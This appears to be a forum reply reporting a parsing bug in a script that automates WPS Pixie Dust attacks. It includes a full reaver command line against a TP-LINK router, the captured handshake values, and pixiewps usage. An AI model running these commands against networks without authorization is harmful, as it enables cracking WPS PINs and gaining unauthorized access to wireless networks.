@mmusket33
I like the idea of your script to automatically try different data sets. I tried it out and it didn't parse the output from reaver correctly.
The E-Nonce and PKE were blank, and it leaves out (-m, --r-nonce : Registrar nonce), but all the required data was in the reaver output.
Usage command line:
reaver -i wlan2mon -b 00:00:00:00:A7:7C -m 00:00:00:00:2c:ee -vv -f -c6 -N -K1 -s y -A -t30 | tee /root/VARMAC_LOGS/TP-TP-LIN00000000
Code:
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire
[+] Switching wlan2mon to channel 6
[+] Waiting for beacon from 00:00:00:00:A7:7C
[+] Associated with 00:00:00:00:A7:7C (ESSID: TP-TP-LIN0000000)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: ba:18:d0:c0:0a:6f:9e:9e:02:48:74:3c:c4:17:8e:1a
[P] PKE: 8f:e6:47:0d:0c:c9:ee:9e:be:28:9b:c7:64:00:ed:b7:54:21:65:5d:c3:74:cb:9f:97:08:42:19:0e:b0:6a:da:91:41:97:1f:f0:79:1d:ae:d8:e3:9c:ac:10:cc:17:73:77:2a:d5:6b:68:d3:3c:85:9a:8d:ef:57:ce:bc:07:c2:7b:4b:24:f1:36:ea:0a:f7:50:b2:e4:24:89:38:99:df:b8:a9:5d:5b:29:b9:87:a7:59:72:3c:7a:6c:d7:da:88:b7:bb:4b:d9:97:08:b5:00:0c:c1:c3:96:8f:10:48:b8:5e:e6:e9:0e:0b:f4:2d:cf:4a:5a:bd:62:e3:27:1f:3e:13:93:ab:1a:b2:bd:bf:1f:41:d4:a5:4d:d9:a9:59:13:16:f0:d0:da:ad:a0:67:b4:34:27:f8:1a:85:4a:2e:a0:c0:b4:12:10:ba:54:d3:4f:ce:37:51:3f:72:f9:6d:99:d4:49:07:ca:13:2b:6f:41:bc:8a:c7:ac:bf:7b:14:58
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Name: TL-WR720N
[P] WPS Model Number: 1.0
[P] Access Point Serial Number: 1.0
[+] Received M1 message
[P] R-Nonce: 11:a4:d4:0f:5e:9e:dd:57:ae:12:5e:35:f2:49:43:18
[P] PKR: 19:6c:b3:0b:98:97:39:c2:3c:a3:f9:10:02:64:d9:07:61:23:7e:f4:71:c7:8f:c1:0e:a9:2c:47:fd:25:7b:61:92:f7:90:fe:05:60:d6:ae:3c:8e:44:60:9f:1e:50:37:e3:5e:e5:e2:fc:b0:59:5f:37:a7:54:1a:33:63:92:ce:96:6b:9a:dd:2e:8b:cd:86:c7:1c:da:ef:45:04:be:c9:b2:0e:cd:14:ad:12:24:25:fb:32:b7:65:40:28:29:f8:5d:98:29:1c:26:1b:6e:10:93:5b:7b:56:1d:4d:84:c9:0d:cb:49:ae:4f:4c:0b:5b:b8:16:80:6e:13:59:fc:52:84:f8:33:3a:49:ee:91:31:8a:a2:4e:1a:01:b2:42:3d:a1:1c:4a:64:33:ae:db:11:05:3c:39:d5:45:69:b4:b5:a6:42:6b:95:2f:3f:b6:07:26:cb:5c:4f:dc:7f:fd:b8:f2:84:6c:5e:23:c6:e0:fd:2e:1d:fa:0a:1f:51:e1:fa
[P] AuthKey: ad:4e:14:01:53:68:1f:c9:4b:bc:c7:7d:ab:96:08:2a:03:6d:dd:29:de:72:21:85:b0:08:a8:0b:bb:66:af:4b
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[P] E-Hash1: b6:9a:85:cb:6d:f9:67:b7:1f:00:9a:da:58:b7:60:ab:01:18:7e:92:5b:5a:43:64:49:6e:d9:32:46:1f:38:ff
[P] E-Hash2: ab:75:8b:80:2e:68:3f:d7:d3:01:b5:81:dc:d6:0a:1e:d4:f0:67:d1:6d:d3:0e:be:80:9a:8f:d7:17:87:ac:2d
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
PDDSA-05.sh output:
Code:
E-Nonce: =
E-BSSID: = 00:00:00:00:A7:7C
PKE: =
PKR: = 8e:8b:95:32:8b:63:02:72:29:fc:4a:60:6f:ba:63:42:e9:e3:f7:39:d3:86:fe:09:d7:94:22:48:5c:40:fd:17:54:f6:30:f5:ba:84:49:4e:34:fb:34:d8:44:c5:c9:ef:bf:e4:56:98:f8:0b:38:e4:00:39:b7:aa:75:6d:5a:77:fb:5a:eb:86:2c:86:f0:cd:44:fd:81:9d:b3:1f:e4:de:10:02:e2:02:40:f5:f3:72:ec:eb:b4:15:96:69:7a:54:ce:48:66:2a:5d:3b:6d:28:82:0c:f8:58:5f:71:31:79:45:72:a7:bd:15:89:46:ec:dc:c1:7f:a6:b5:aa:9a:51:8e:28:5d:4a:3e:87:27:f9:d9:e1:30:4e:44:aa:18:63:62:79:7e:a7:4f:85:9c:e7:5e:1d:ca:e5:81:e3:04:98:94:8c:3b:8c:b0:9c:4b:05:bb:99:3e:7b:86:19:f3:e6:e7:ae:64:be:d6:13:08:d0:9b:74:f4:b5:72:9b:62:8d
AuthKey: = 44:7a:30:93:b2:57:65:37:ed:9e:68:ce:32:68:f6:3f:6f:93:7d:cd:9c:01:fa:8a:17:0f:25:be:94:9c:fb:03
E-Hash1: = 96:0a:c7:fa:93:37:cd:7e:28:31:6f:a5:af:58:95:e7:28:ae:c4:54:75:62:de:8e:39:34:71:0a:ea:c4:91:bc
E-Hash2: = df:67:fb:4e:b9:bb:b6:0c:82:78:80:99:7c:bb:9f:a4:b2:4f:04:fd:e0:db:dd:32:ae:5b:f1:0a:7c:35:ae:c8
Pixiewps 1.1 WPS pixie dust attack tool
Copyright (c) 2015, wiire <[email protected]>
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : Enrollee Hash1
-z, --e-hash2 : Enrollee Hash2
-a, --authkey : Authentication session key
Optional Arguments:
-n, --e-nonce : Enrollee nonce (mode 2,3,4)
-m, --r-nonce : Registrar nonce
-b, --e-bssid : Enrollee BSSID
-S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
-f, --force : Bruteforce the whole keyspace (mode 4) [No]
-v, --verbosity : Verbosity level 1-3, 1 is quietest [2]
-h, --help : Display this usage screen
Examples:
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
[!] Bad enrollee nonce -- --e-bssid
WPS Pin Not Found.
Pixie Dust Sequences Exhausted - ending program.
This was with repeated tries; in the first try, not posted here, I used -P in reaver. In every set it left out PKE and E-Nonce... no R-Nonce.
I'm happy to help beta, but you should probably make your thread to troubleshoot.